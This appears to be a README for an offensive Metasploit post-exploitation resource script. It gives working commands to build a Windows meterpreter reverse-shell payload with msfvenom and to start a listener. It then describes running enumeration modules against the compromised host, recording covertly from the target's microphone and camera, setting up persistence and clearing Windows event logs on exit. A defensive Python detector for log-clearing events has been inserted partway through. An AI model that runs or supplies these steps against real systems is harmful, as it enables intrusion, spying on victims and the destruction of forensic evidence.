post_exploitation.rc | offensive resource script
Resource file to automate/assist in session post-exploitation tasks.
This script displays a menu of commands based on the session platform (Windows or Linux).
It also queries the framework database for the session ID so that post modules can be run against it.
It also allows us to automatically launch multiple msf post modules against the target session.
Example of commands being executed using [Command]: gather
localtime
sysinfo
getuid
run post/windows/gather/checkvm
webcam_list
run post/multi/gather/wlan_geolocate
run post/windows/gather/enum_shares
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_computers
run post/windows/gather/enum_applications
enumdesktops
show_mount
run post/windows/recon/enum_protections
unsetg all
unset all
This script can be reviewed here
'This script can NOT be run in the meterpreter prompt because ERB code is not accepted'
'On Windows platforms the script will clean target event viewer artifacts (logs) at exit'
'If no value (setg) has been provided (before exec) then this script will use its own default values'
msf > setg MSF_PATH /opt/metasploit-framework
=> (absolute path of metasploit-framework)
msf > setg REC_TIME 15
=> (timeout in sec to record using target mic/camera)
REMARK: These global settings (setg) will be cleaned every time the script ends execution.
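The log cleanup at exit mentioned in the notes above is itself visible to defenders: when a Windows event log is cleared, Event ID 1102 is written to the Security log and Event ID 104 to the System log. The following detection example is added here and is not part of post_exploitation.rc or this repository; the JSON field names and the sample records are constructed assumptions.

```python
import json
from datetime import datetime, timedelta

# Constructed sample: one JSON event per line. Field names are assumptions
# modelled on a generic SIEM export, not output of the script.
SAMPLE = """\
{"host":"WS01","time":"2024-01-10T14:02:11","channel":"System","event_id":7036,"cleared":null}
{"host":"WS01","time":"2024-01-10T14:05:40","channel":"System","event_id":104,"cleared":"Application"}
{"host":"WS01","time":"2024-01-10T14:05:41","channel":"System","event_id":104,"cleared":"System"}
{"host":"WS01","time":"2024-01-10T14:05:41","channel":"Security","event_id":1102,"cleared":null}
{"host":"SRV02","time":"2024-01-10T09:00:00","channel":"System","event_id":104,"cleared":"Application"}
this line is malformed and must be skipped
"""

# (channel, event id) pairs Windows records when a log is cleared.
CLEAR_EVENTS = {("Security", 1102), ("System", 104)}


def find_log_wipes(lines, window=timedelta(seconds=60), min_logs=2):
    """Flag hosts where at least min_logs distinct logs were cleared within window."""
    by_host = {}
    for line in lines:
        try:
            ev = json.loads(line)
            key = (ev["channel"], int(ev["event_id"]))
            ts = datetime.fromisoformat(ev["time"])
            host = ev["host"]
        except (ValueError, KeyError, TypeError):
            continue  # blank or malformed record
        if key in CLEAR_EVENTS:
            # 1102 carries no target name: the cleared log is Security itself.
            by_host.setdefault(host, []).append((ts, ev.get("cleared") or ev["channel"]))

    alerts = []
    for host, hits in sorted(by_host.items()):
        hits.sort()
        for i, (start, _) in enumerate(hits):
            logs = {name for ts, name in hits[i:] if ts - start <= window}
            if len(logs) >= min_logs:
                alerts.append({"host": host, "first_seen": start.isoformat(),
                               "logs": sorted(logs)})
                break  # one alert per host
    return alerts


if __name__ == "__main__":
    for alert in find_log_wipes(SAMPLE.splitlines()):
        print(alert)
```

A single cleared log (SRV02 in the sample) stays below the default threshold; set min_logs=1 to report every clear event.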
git clone https://github.com/r00t-3xp10it/resource_files.git
cd resource_files
cd aux
sudo chmod +x install.sh
sudo ./install.sh
As we can see from the above screenshot, the 'post_exploitation.rc' resource script requires 3 metasploit post modules written by me to assist in post-exploitation tasks, from gathering info until persisting our payload in the target system, or using the freevulnsearch.nse nmap NSE script (@Mathias Gut) to scan for possible CVEs present...
cd ..
sudo service postgresql start
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=666 -f exe -o binary.exe
msfconsole -q -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.1.11; set LPORT 666; exploit'
REMARK: execute binary.exe with admin privs (execute as admin)
meterpreter > background
msf > resource post_exploitation.rc
[command]: play_youtube
[+] Input youtube URL: 35Yq7ae6F8E
msf > resource post_exploitation.rc
[command]: rec_target
[+] Record audio from target microphone? (y/n): yes
[+] Record video from target camera? (y/n): yes
If we decide to use a Linux payload,
then this script will present a different 'commands menu' for Linux platforms.
- post_exploitation.rc video tutorial (windows platforms)
https://www.youtube.com/watch?v=PcT-25YCdoQ